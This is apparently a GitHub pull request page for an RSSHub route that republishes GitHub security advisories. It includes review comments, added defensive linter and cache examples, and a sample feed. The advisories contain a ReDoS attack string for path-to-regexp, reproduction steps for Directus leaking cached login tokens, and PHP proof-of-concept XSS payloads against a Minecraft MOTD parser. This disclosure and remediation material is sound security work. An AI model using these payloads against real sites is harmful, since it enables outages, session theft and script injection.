<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0">https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0</a></li>
<li><a href="https://github.com/advisories/GHSA-9wv6-86v2-598j">https://github.com/advisories/GHSA-9wv6-86v2-598j</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-9wv6-86v2-598j</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-9wv6-86v2-598j</guid>
<author>GitHub</author>
</item>
<item>
<title>[path-to-regexp] path-to-regexp outputs backtracking regular expressions</title>
<description><h3 id="impact">Impact</h3>
<p>A bad regular expression is generated any time you have two parameters within a single segment, separated by something that is not a period (<code>.</code>). For example, <code>/:a-:b</code>.</p>
<h3 id="patches">Patches</h3>
<p>For users of 0.1, upgrade to <code>0.1.10</code>. All other users should upgrade to <code>8.0.0</code>.</p>
<p>These versions add backtrack protection when a custom regex pattern is not provided:</p>
<ul>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v0.1.10">0.1.10</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v1.9.0">1.9.0</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v3.3.0">3.3.0</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0">6.3.0</a></li>
</ul>
<p>They do not protect against vulnerable user supplied capture groups. Protecting against explicit user patterns is out of scope for old versions and not considered a vulnerability.</p>
<p>Version <a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v7.1.0">7.1.0</a> can enable <code>strict: true</code> and get an error when the regular expression might be bad.</p>
<p>Version <a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v8.0.0">8.0.0</a> removes the features that can cause a ReDoS.</p>
<h3 id="workarounds">Workarounds</h3>
<p>All versions can be patched by providing a custom regular expression for parameters after the first in a single segment. As long as the custom regular expression does not match the text before the parameter, you will be safe. For example, change <code>/:a-:b</code> to <code>/:a-:b([^-/]+)</code>.</p>
<p>If paths cannot be rewritten and versions cannot be upgraded, another alternative is to limit the URL length. For example, halving the attack string improves performance by 4x.</p>
<h3 id="details">Details</h3>
<p>Using <code>/:a-:b</code> will produce the regular expression <code>/^\/([^\/]+?)-([^\/]+?)\/?$/</code>. This can be exploited by a path such as <code>/a${'-a'.repeat(8_000)}/a</code>. <a href="https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS">OWASP</a> has a good example of why this occurs, but the TL;DR is the <code>/a</code> at the end ensures this route would never match but due to naive backtracking it will still attempt every combination of the <code>:a-:b</code> on the repeated 8,000 <code>-a</code>.</p>
<p>Because JavaScript is single threaded and regex matching runs on the main thread, poor performance will block the event loop and can lead to a DoS. In local benchmarks, exploiting the unsafe regex will result in performance that is over 1000x worse than the safe regex. In a more realistic environment using Express v4 and 10 concurrent connections, this translated to average latency of ~600ms vs 1ms.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS">OWASP</a></li>
<li><a href="https://blakeembrey.com/posts/2024-09-web-redos/">Detailed blog post</a></li>
</ul>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j">https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f">https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6">https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45296">https://nvd.nist.gov/vuln/detail/CVE-2024-45296</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/925ac8e3c5780b02f58cbd4e52f95da8ad2ac485">https://github.com/pillarjs/path-to-regexp/commit/925ac8e3c5780b02f58cbd4e52f95da8ad2ac485</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/d31670ae8f6e69cbfd56e835742195b7d10942ef">https://github.com/pillarjs/path-to-regexp/commit/d31670ae8f6e69cbfd56e835742195b7d10942ef</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894">https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0">https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0</a></li>
<li><a href="https://github.com/advisories/GHSA-9wv6-86v2-598j">https://github.com/advisories/GHSA-9wv6-86v2-598j</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-9wv6-86v2-598j</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-9wv6-86v2-598j</guid>
<author>GitHub</author>
</item>
<item>
<title>[@directus/api] Session is cached for OpenID and OAuth2 if `redirect` is not used</title>
<description><h3 id="summary">Summary</h3>
<p>Unauthenticated user can access credentials of last authenticated user via OpenID or OAuth2 where the authentication URL did not include <code>redirect</code> query string.</p>
<p>For example:</p>
<ul>
<li>Project is configured with OpenID or OAuth2</li>
<li>Project is configured with cache enabled</li>
<li>User tries to login via SSO link, but without <code>redirect</code> query string</li>
<li>After successful login, credentials are cached</li>
<li>If an unauthenticated user tries to login via SSO link, it will return the credentials of the other last user</li>
</ul>
<p>The SSO link is something like <code>https://directus.example.com/auth/login/openid/callback</code>, where <code>openid</code> is the name of the OpenID provider configured in Directus</p>
<h3 id="details">Details</h3>
<p>This happens because on that endpoint, for both OpenID and OAuth2, Directus uses the <code>respond</code> middleware, which by default tries to cache GET requests that meet certain conditions. However, those conditions do not account for this scenario, in which an unauthenticated request returns user credentials.
For OpenID, this can be seen here:
<a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459">https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459</a>
And for OAuth2, here:
<a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428">https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428</a></p>
<h3 id="poc">PoC</h3>
<ul>
<li>Create a new Directus project</li>
<li>Set <code>CACHE_ENABLED</code> to true</li>
<li>Set <code>CACHE_STORE</code> to <code>redis</code> for reliable results (if using memory with multiple nodes, it may only happen sometimes, due to cache being different for different nodes)</li>
<li>Configure <code>REDIS</code> with redis string or redis host, port, user, etc.</li>
<li>Set <code>AUTH_PROVIDERS</code> to <code>openid</code></li>
<li>Set <code>PUBLIC_URL</code> to the main URL of your project. For example, <code>PUBLIC_URL: http://localhost:8055</code></li>
<li>Configure <code>AUTH_OPENID_CLIENT_ID</code>, <code>AUTH_OPENID_CLIENT_SECRET</code>, <code>AUTH_OPENID_ISSUER_URL</code> with proper OpenID configurations</li>
<li>Be sure that on OpenID external app you have configured Redirect URI to <code>http://localhost:8055/auth/login/openid/callback</code></li>
<li>Run Directus</li>
<li>Open the SSO link like <code>http://localhost:8055/auth/login/openid/callback</code></li>
<li>Do the authentication on the OpenID external webpage</li>
<li>Verify that you got redirected to a page with a JSON including the <code>access_token</code> property</li>
<li>Be sure all anonymous mode windows are closed</li>
<li>Open an anonymous window and go to the SSO Link <code>http://localhost:8055/auth/login/openid/callback</code> and see you have the same credentials, even though you don't have any session because you are in anonymous mode</li>
</ul>
<h3 id="impact">Impact</h3>
<p>All projects using OpenID or OAuth2 that do not include the <code>redirect</code> query string when logging in users.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8">https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8</a></li>
<li><a href="https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b">https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b</a></li>
<li><a href="https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52">https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52</a></li>
<li><a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428">https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428</a></li>
<li><a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459">https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45596">https://nvd.nist.gov/vuln/detail/CVE-2024-45596</a></li>
<li><a href="https://github.com/advisories/GHSA-cff8-x7jv-4fm8">https://github.com/advisories/GHSA-cff8-x7jv-4fm8</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-cff8-x7jv-4fm8</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-cff8-x7jv-4fm8</guid>
<author>GitHub</author>
</item>
<item>
<title>[directus] Session is cached for OpenID and OAuth2 if `redirect` is not used</title>
<description><h3 id="summary">Summary</h3>
<p>Unauthenticated user can access credentials of last authenticated user via OpenID or OAuth2 where the authentication URL did not include <code>redirect</code> query string.</p>
<p>For example:</p>
<ul>
<li>Project is configured with OpenID or OAuth2</li>
<li>Project is configured with cache enabled</li>
<li>User tries to login via SSO link, but without <code>redirect</code> query string</li>
<li>After successful login, credentials are cached</li>
<li>If an unauthenticated user tries to login via SSO link, it will return the credentials of the other last user</li>
</ul>
<p>The SSO link is something like <code>https://directus.example.com/auth/login/openid/callback</code>, where <code>openid</code> is the name of the OpenID provider configured in Directus</p>
<h3 id="details">Details</h3>
<p>This happens because on that endpoint, for both OpenID and OAuth2, Directus uses the <code>respond</code> middleware, which by default tries to cache GET requests that meet certain conditions. However, those conditions do not account for this scenario, in which an unauthenticated request returns user credentials.
For OpenID, this can be seen here:
<a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459">https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459</a>
And for OAuth2, here:
<a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428">https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428</a></p>
<h3 id="poc">PoC</h3>
<ul>
<li>Create a new Directus project</li>
<li>Set <code>CACHE_ENABLED</code> to true</li>
<li>Set <code>CACHE_STORE</code> to <code>redis</code> for reliable results (if using memory with multiple nodes, it may only happen sometimes, due to cache being different for different nodes)</li>
<li>Configure <code>REDIS</code> with redis string or redis host, port, user, etc.</li>
<li>Set <code>AUTH_PROVIDERS</code> to <code>openid</code></li>
<li>Set <code>PUBLIC_URL</code> to the main URL of your project. For example, <code>PUBLIC_URL: http://localhost:8055</code></li>
<li>Configure <code>AUTH_OPENID_CLIENT_ID</code>, <code>AUTH_OPENID_CLIENT_SECRET</code>, <code>AUTH_OPENID_ISSUER_URL</code> with proper OpenID configurations</li>
<li>Be sure that on OpenID external app you have configured Redirect URI to <code>http://localhost:8055/auth/login/openid/callback</code></li>
<li>Run Directus</li>
<li>Open the SSO link like <code>http://localhost:8055/auth/login/openid/callback</code></li>
<li>Do the authentication on the OpenID external webpage</li>
<li>Verify that you got redirected to a page with a JSON including the <code>access_token</code> property</li>
<li>Be sure all anonymous mode windows are closed</li>
<li>Open an anonymous window and go to the SSO Link <code>http://localhost:8055/auth/login/openid/callback</code> and see you have the same credentials, even though you don't have any session because you are in anonymous mode</li>
</ul>
<h3 id="impact">Impact</h3>
<p>All projects using OpenID or OAuth2 that do not include the <code>redirect</code> query string when logging in users.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8">https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8</a></li>
<li><a href="https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b">https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b</a></li>
<li><a href="https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52">https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52</a></li>
<li><a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428">https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428</a></li>
<li><a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459">https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45596">https://nvd.nist.gov/vuln/detail/CVE-2024-45596</a></li>
<li><a href="https://github.com/advisories/GHSA-cff8 ... |
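The two path-to-regexp entries in the feed above describe one defect and one workaround. The following is an added example, written for this page and not taken from path-to-regexp or from this PR, that turns the advisory's guidance into a small linter. `compileRoute()` is a simplified, assumed re-implementation of how the library builds the regex for `/:a-:b` (it reproduces the advisory's `/^\/([^\/]+?)-([^\/]+?)\/?$/` but is not the library's code); `findRiskyParams()` flags a second parameter in a segment that is separated from the first by anything but `.` and has no custom pattern; `hardenRoute()` applies the advisory's workaround by appending a pattern that cannot match the separator. The probe input is the advisory's, with the repeat count halved to keep the demo short.

```javascript
// Added example, not path-to-regexp's code: lint and harden route paths that
// hit the backtracking pattern described in GHSA-9wv6-86v2-598j.

// ":name", optionally followed by a custom pattern in parentheses, e.g. ":b([^-/]+)".
// (Assumption: custom patterns contain no nested parentheses.)
const PARAM = /:([A-Za-z_][A-Za-z0-9_]*)(?:\(([^)]+)\))?/g;

function escapeRegExp(s) {
  return s.replace(/[.*+?^${}()|[\]\\\/]/g, '\\$&');
}

// Simplified, assumed re-implementation of the library's output: each param
// becomes a capture group holding its custom pattern, or the lazy default
// "[^\/]+?", so "/:a-:b" compiles to /^\/([^\/]+?)-([^\/]+?)\/?$/ as in the advisory.
function compileRoute(path) {
  let src = '';
  let last = 0;
  for (const m of path.matchAll(PARAM)) {
    src += escapeRegExp(path.slice(last, m.index));
    src += `(${m[2] ?? '[^\\/]+?'})`;
    last = m.index + m[0].length;
  }
  src += escapeRegExp(path.slice(last));
  return new RegExp(`^${src}\\/?$`, 'i');
}

// Report each param that shares a "/"-segment with the previous param, is
// separated from it by anything other than ".", and has no custom pattern.
// Adjacent params with no separator at all are reported but not fixable:
// there is no separator text for a custom pattern to exclude.
function findRiskyParams(path) {
  const findings = [];
  const params = [...path.matchAll(PARAM)];
  for (let i = 1; i < params.length; i++) {
    const prev = params[i - 1];
    const cur = params[i];
    const separator = path.slice(prev.index + prev[0].length, cur.index);
    if (separator.includes('/')) continue; // different segment
    if (separator === '.' || cur[2] !== undefined) continue;
    findings.push({ index: cur.index, param: cur[1], separator, fixable: separator.length > 0 });
  }
  return findings;
}

// The advisory's workaround: give the second param a pattern that cannot
// match the separator, e.g. "/:a-:b" -> "/:a-:b([^-/]+)", so the engine has
// only one way to split the text between the two groups.
function hardenRoute(path) {
  let out = path;
  for (const f of findRiskyParams(path).reverse()) { // patch right-to-left so indexes stay valid
    if (!f.fixable) continue;
    const chars = [...new Set(f.separator)]
      .sort((a, b) => (a === '-' ? -1 : b === '-' ? 1 : 0)) // keep "-" first, where it is literal
      .map((c) => (c === ']' || c === '\\' || c === '^' ? `\\${c}` : c))
      .join('');
    const end = f.index + `:${f.param}`.length;
    out = `${out.slice(0, end)}([^${chars}/]+)${out.slice(end)}`;
  }
  return out;
}

// The advisory's probe: n copies of "-a", then "/a" so the route can never match.
function attackPath(n) {
  return `/a${'-a'.repeat(n)}/a`;
}

function timeMatch(re, input) {
  const t0 = process.hrtime.bigint();
  const matched = re.test(input);
  return { matched, ms: Number(process.hrtime.bigint() - t0) / 1e6 };
}

const vulnerableRe = compileRoute('/:a-:b');
const hardenedRe = compileRoute(hardenRoute('/:a-:b'));
const probe = attackPath(4000); // half the advisory's 8,000, to keep the demo short
console.log('findings:', findRiskyParams('/:a-:b'));
console.log('vulnerable', vulnerableRe.source, timeMatch(vulnerableRe, probe));
console.log('hardened  ', hardenedRe.source, timeMatch(hardenedRe, probe));
```

Run it with Node and compare the two `ms` values: the hardened regex fails the probe in a single left-to-right pass, while the default output re-tries every split of the `-a` run before giving up, which is the quadratic behaviour the advisory measures. The linter only applies the workaround where the advisory says it is sufficient; an adjacent pair like `/:a:b` is reported as unfixable because no separator exists for the custom pattern to exclude.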
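The Directus entries in the feed above all describe one failure: a shared response cache that stores a login callback carrying tokens, so the next client to hit the same URL receives someone else's session. The following is an added example, constructed for this page and not Directus code, that replays that scenario against a minimal respond-style GET cache and shows a predicate that keeps per-user responses out of it. Assumed, not taken from Directus: the cache key is method plus path (query string and cookies ignored), the store is shared by all clients, and the token exchange is faked.

```javascript
// Added example, not Directus code: a respond-style GET cache, a rule that
// refuses to cache per-user responses, and a replay of GHSA-cff8-x7jv-4fm8.

function createResponder({ cacheable }) {
  const store = new Map(); // stands in for a store shared by every client (e.g. Redis)
  return function respond(req, handler) {
    const key = `${req.method} ${req.path}`; // assumption: query string and cookies are not part of the key
    if (req.method === 'GET' && store.has(key)) {
      return { ...store.get(key), fromCache: true };
    }
    const res = handler(req);
    if (req.method === 'GET' && res.status === 200 && cacheable(req, res)) {
      store.set(key, res);
    }
    return { ...res, fromCache: false };
  };
}

// Constructed OpenID callback: with an authorization code it returns the
// session tokens as JSON (the "no redirect query string" branch of the
// advisory); without one it bounces the browser to the provider.
function openidCallback(req) {
  const code = req.query.code;
  if (!code) {
    return { status: 302, headers: { location: 'https://idp.example/authorize' }, body: null };
  }
  return {
    status: 200,
    headers: { 'content-type': 'application/json' },
    body: { access_token: `tok_${code}`, refresh_token: `rt_${code}` }, // fake exchange
  };
}

// Vulnerable rule: every successful GET is cached, whoever it was for.
const cacheEverything = () => true;

// Hardened rule: never cache a response that belongs to one principal.
const CREDENTIAL_FIELDS = ['access_token', 'refresh_token', 'id_token'];
function cacheOnlyPublic(req, res) {
  if (req.path.startsWith('/auth/')) return false; // auth endpoints are never public
  if (req.headers.authorization || req.headers.cookie) return false; // request is already personalised
  const cc = (res.headers['cache-control'] || '').toLowerCase();
  if (cc.includes('no-store') || cc.includes('private')) return false;
  if (res.headers['set-cookie']) return false; // response establishes a session
  if (res.body && CREDENTIAL_FIELDS.some((f) => f in res.body)) return false;
  return true;
}

// Replay: user A completes the login, then an anonymous client opens the bare
// callback URL. Returns what the anonymous client sees.
function replayScenario(cacheable) {
  const respond = createResponder({ cacheable });
  const path = '/auth/login/openid/callback';
  respond({ method: 'GET', path, query: { code: 'A' }, headers: {} }, openidCallback);
  return respond({ method: 'GET', path, query: {}, headers: {} }, openidCallback);
}

console.log('vulnerable:', JSON.stringify(replayScenario(cacheEverything)));
console.log('hardened:  ', JSON.stringify(replayScenario(cacheOnlyPublic)));
```

With `cacheEverything` the anonymous request is served `tok_A` from the cache; with `cacheOnlyPublic` the first response is never stored and the anonymous client gets the 302 it should. The predicate is deliberately redundant (path prefix, request headers, response headers, body fields) because any one of those signals alone is easy to miss when a new endpoint is added.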
@@ -0,0 +1,72 @@ | |||
import type { Namespace } from '@/types'; |
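Review bot: this new file imports `Namespace` from '@/types', i.e. it declares a namespace of its own, while the feed generated above was served at `/github-advisor/data`; RSSHub already has a `github` namespace for github.com, so a second one for the same site is a variant rather than a new namespace. Put the route under the existing `github` directory and reuse its namespace instead of declaring one here.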
https://docs.rsshub.app/joinus/new-rss/start-code#creating-namespace
Do not create variations for the same namespace. Please use github
instead.
Thank you for the feedback! I've consolidated the namespace under github
as suggested and removed the variations. Please review the updated implementation and let me know if further adjustments are needed.
This comment was marked as duplicate.
Please resolve merge conflicts
lib/routes/github/advisor.ts
Outdated
import { parseDate } from '@/utils/parse-date'; | ||
export const route: Route = { | ||
path: '/advisor/data/:category?', | ||
categories: ['game'], |
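Review bot: `categories: ['game']` is wrong for a feed of security advisories; RSSHub's other github.com routes use `programming`, which is where this belongs. In the same hunk, `path: '/advisor/data/:category?'` makes the ecosystem optional but nothing visible supplies a default, so a request to `/advisor/data` would build the upstream URL from `undefined`; either give `category` a default or make the segment required, and list the accepted values in the route's `parameters` so users know what to pass.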
This does not belong to game
at all.
lib/routes/github/advisor.ts
Outdated
const apiRootUrl = 'https://azu.github.io/github-advisory-database-rss'; | ||
const apiUrl = `${apiRootUrl}/${category}.json`; | ||
const currentUrl = `https://github.com/advisories`; | ||
|
||
const response = await got({ | ||
method: 'get', | ||
url: apiUrl, | ||
}); | ||
|
||
const items = response.data.items.map((item) => ({ | ||
author: item.author.name, | ||
title: item.title, | ||
link: item.url, | ||
description: item.content_html, | ||
pubDate: parseDate(item.date_publishede), | ||
})); |
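Review bot: `item.date_publishede` is a typo for the JSON Feed field `date_published`, so `pubDate` is computed from `undefined` and every item ends up without a valid date; fix the key and fail loudly if it is missing rather than emitting a dateless feed. Two smaller points in the same hunk: `category` is interpolated straight into `${apiRootUrl}/${category}.json`, so validate it against the ecosystems the upstream actually publishes before building the URL; and the source is a third-party mirror of the advisory database, so if it stays, check the response status and shape instead of assuming `response.data.items` exists.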
Please use first party data at https://github.com/advisories
when it's available instead of relying on third parties'.
I have updated the code to use first-party data from https://github.com/advisories when available, instead of relying on third parties.
This comment was marked as outdated.
…n third-party API
This comment was marked as duplicate.
Successfully generated as follows: http://localhost:1200/github/advisor/data/reviewed/composer - Success ✔️<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">
<channel>
<title>GitHub Advisory Database RSS - composer - reviewed</title>
<link>https://github.com/advisories</link>
<atom:link href="http://localhost:1200/github/advisor/data/reviewed/composer" rel="self" type="application/rss+xml"></atom:link>
<description>GitHub Advisory Database RSS - composer - reviewed - Powered by RSSHub</description>
<generator>RSSHub</generator>
<webMaster>contact@rsshub.app (RSSHub)</webMaster>
<language>en</language>
<lastBuildDate>Sat, 05 Oct 2024 18:30:58 GMT</lastBuildDate>
<ttl>5</ttl>
<item>
<title>Minecraft MOTD Parser's HtmlGenerator vulnerable to XSS</title>
<description><h3>Summary</h3>
<p>The <code class="notranslate">HtmlGenerator</code> class is subject to potential cross-site scripting (XSS) attack through a parsed malformed Minecraft server MOTD.</p>
<h3>Context</h3>
<p>Minecraft server owners can set a so-called MOTD (Message of the Day) for their server that appears next to the server icon and below the server name on the multiplayer server list of a player's Minecraft client. The Minecraft server sends the MOTD in the <code class="notranslate">description</code> property of the <a href="https://wiki.vg/Server_List_Ping#Status_Response" rel="nofollow">Status Response</a> packet. The <a href="https://github.com/jgniecki/MinecraftMotdParser">jgniecki/MinecraftMotdParser</a> PHP library is able to parse the value of the <code class="notranslate">description</code> property, which can be either a string or an array of text components. By utilizing the aforementioned <code class="notranslate">HtmlGenerator</code> class, it is also able to transform the value into an HTML string that can be used to visualize the MOTD on a web page.</p>
<h3>Details</h3>
<p>The <code class="notranslate">HtmlGenerator</code> iterates through objects of <code class="notranslate">MotdItem</code> that are contained in an object of <code class="notranslate">MotdItemCollection</code> to generate an HTML string. An attacker can supply malicious input to the <code class="notranslate">color</code> and <code class="notranslate">text</code> properties of <code class="notranslate">MotdItem</code> to inject their own HTML into a web page during web page generation, for example by sending a malicious MOTD from a Minecraft server under their control that was queried and passed to the <code class="notranslate">HtmlGenerator</code>.</p>
<p>This XSS vulnerability exists because the values of these properties are neither filtered nor escaped, as can be seen here:</p>
<ul>
<li><a href="https://github.com/jgniecki/MinecraftMotdParser/blob/0412f68eeb91729a00444a8d6c00c45623884aa5/src/Generator/HtmlGenerator.php#L49">https://github.com/jgniecki/MinecraftMotdParser/blob/0412f68eeb91729a00444a8d6c00c45623884aa5/src/Generator/HtmlGenerator.php#L49</a></li>
<li><a href="https://github.com/jgniecki/MinecraftMotdParser/blob/0412f68eeb91729a00444a8d6c00c45623884aa5/src/Generator/HtmlGenerator.php#L80">https://github.com/jgniecki/MinecraftMotdParser/blob/0412f68eeb91729a00444a8d6c00c45623884aa5/src/Generator/HtmlGenerator.php#L80</a></li>
</ul>
<h3>Proof of Concept</h3>
<p>JavaScript code can be injected into the <code class="notranslate">HtmlGenerator</code> by parsing either a string via <code class="notranslate">TextParser</code> or an array via <code class="notranslate">ArrayParser</code>. The following code examples demonstrate the vulnerability by triggering the alert dialog of the browser.</p>
<h4>XSS via <code class="notranslate">TextParser</code></h4>
<div class="highlight highlight-text-html-php"><pre class="notranslate"><span class="pl-ent">&lt;?php</span>
<span class="pl-k">use</span> <span class="pl-v">DevLancer</span>\<span class="pl-v">MinecraftMotdParser</span>\<span class="pl-v">Collection</span>\<span class="pl-v">MotdItemCollection</span>;
<span class="pl-k">use</span> <span class="pl-v">DevLancer</span>\<span class="pl-v">MinecraftMotdParser</span>\<span class="pl-v">Generator</span>\<span class="pl-v">HtmlGenerator</span>;
<span class="pl-k">use</span> <span class="pl-v">DevLancer</span>\<span class="pl-v">MinecraftMotdParser</span>\<span class="pl-v">Parser</span>\<span class="pl-v">TextParser</span>;
<span class="pl-s1"><span class="pl-c1">$</span>motdCollection</span> = (<span class="pl-k">new</span> <span class="pl-v">TextParser</span>())-&gt;<span class="pl-en">parse</span>(<span class="pl-s">'<span class="pl-s">&lt;script&gt;alert("XSS on page load")&lt;/script&gt;</span>'</span>, <span class="pl-k">new</span> <span class="pl-v">MotdItemCollection</span>());
<span class="pl-k">echo</span> (<span class="pl-k">new</span> <span class="pl-v">HtmlGenerator</span>())-&gt;<span class="pl-en">generate</span>(<span class="pl-s1"><span class="pl-c1">$</span>motdCollection</span>);</pre></div>
<h4>XSS via <code class="notranslate">ArrayParser</code></h4>
<div class="highlight highlight-text-html-php"><pre class="notranslate"><span class="pl-ent">&lt;?php</span>
<span class="pl-k">use</span> <span class="pl-v">DevLancer</span>\<span class="pl-v">MinecraftMotdParser</span>\<span class="pl-v">Collection</span>\<span class="pl-v">MotdItemCollection</span>;
<span class="pl-k">use</span> <span class="pl-v">DevLancer</span>\<span class="pl-v">MinecraftMotdParser</span>\<span class="pl-v">Generator</span>\<span class="pl-v">HtmlGenerator</span>;
<span class="pl-k">use</span> <span class="pl-v">DevLancer</span>\<span class="pl-v">MinecraftMotdParser</span>\<span class="pl-v">Parser</span>\<span class="pl-v">ArrayParser</span>;
<span class="pl-s1"><span class="pl-c1">$</span>motdCollection</span> = (<span class="pl-k">new</span> <span class="pl-v">ArrayParser</span>())-&gt;<span class="pl-en">parse</span>([
[
<span class="pl-s">'<span class="pl-s">color</span>'</span> =&gt; <span class="pl-s">'<span class="pl-c">#" onmouseover="javascript:alert(\'XSS when mouse pointer enters the span element\')"',</span><span class="pl-s"></span></span>
<span class="pl-s"><span class="pl-s"> </span>'text' =&gt;<span class="pl-s"> </span>'</span><span class="pl-v">Hover</span> me',
],
[
<span class="pl-s">'<span class="pl-s">color</span>'</span> =&gt; <span class="pl-s">'<span class="pl-s">#000000</span>'</span>,
<span class="pl-s">'<span class="pl-s">text</span>'</span> =&gt; <span class="pl-s">'<span class="pl-s">&lt;script&gt;alert("XSS on page load")&lt;/script&gt;</span>'</span>,
]
], <span class="pl-k">new</span> <span class="pl-v">MotdItemCollection</span>());
<span class="pl-k">echo</span> (<span class="pl-k">new</span> <span class="pl-v">HtmlGenerator</span>())-&gt;<span class="pl-en">generate</span>(<span class="pl-s1"><span class="pl-c1">$</span>motdCollection</span>);</pre></div>
<h3>Impact</h3>
<p>If the <code class="notranslate">HtmlGenerator</code> class of this library is used, this XSS vulnerability can potentially affect:</p>
<ul>
<li>Players visiting Minecraft server list websites (of which there are several dozen online, written in PHP) that display the MOTD.</li>
<li>Users visiting Minecraft server status websites to query information about a Minecraft server.</li>
<li>Server owners managing their Minecraft server via a web interface that displays the MOTD, where the attack could be carried out by a malicious Minecraft server plugin that modifies the MOTD without the server owner's consent.</li>
</ul>
<p>It is not clear if and which platforms depend on this library.</p>
<h3>Remediation</h3>
<p>I suggest converting all HTML special characters in the values of the <code class="notranslate">color</code> and <code class="notranslate">text</code> properties to HTML entities. The display of the HTML entities will still be correct in the browser, but the XSS vulnerability will be eliminated as the values will no longer be interpreted as HTML by the browser.</p>
<p>This could be achieved by introducing a new private <code class="notranslate">escape</code> function in the <code class="notranslate">HtmlGenerator</code> class:</p>
<div class="highlight highlight-text-html-php"><pre class="notranslate"><span class="pl-k">private</span> <span class="pl-k">function</span> <span class="pl-en">escape</span>(<span class="pl-smi">string</span> <span class="pl-s1"><span class="pl-c1">$</span>text</span>): <span class="pl-smi">string</span>
{
<span class="pl-k">return</span> <span class="pl-en">htmlentities</span>(<span class="pl-s1"><span class="pl-c1">$</span>text</span>, <span class="pl-c1">ENT_QUOTES</span> | <span class="pl-c1">ENT_HTML5</span>, <span class="pl-s">'<span class="pl-s">UTF-8</span>'</span>);
}</pre></div>
<p>This function should be called in the following two lines:</p>
<ul>
<li><a href="https://github.com/jgniecki/MinecraftMotdParser/blob/0412f68eeb91729a00444a8d6c00c45623884aa5/src/Generator/HtmlGenerator.php#L49">https://github.com/jgniecki/MinecraftMotdParser/blob/0412f68eeb91729a00444a8d6c00c45623884aa5/src/Generator/HtmlGenerator.php#L49</a><br>
Change to: <code class="notranslate">$tags['span'][] = sprintf('color: %s;', $this-&gt;escape($motdItem-&gt;getColor()));</code></li>
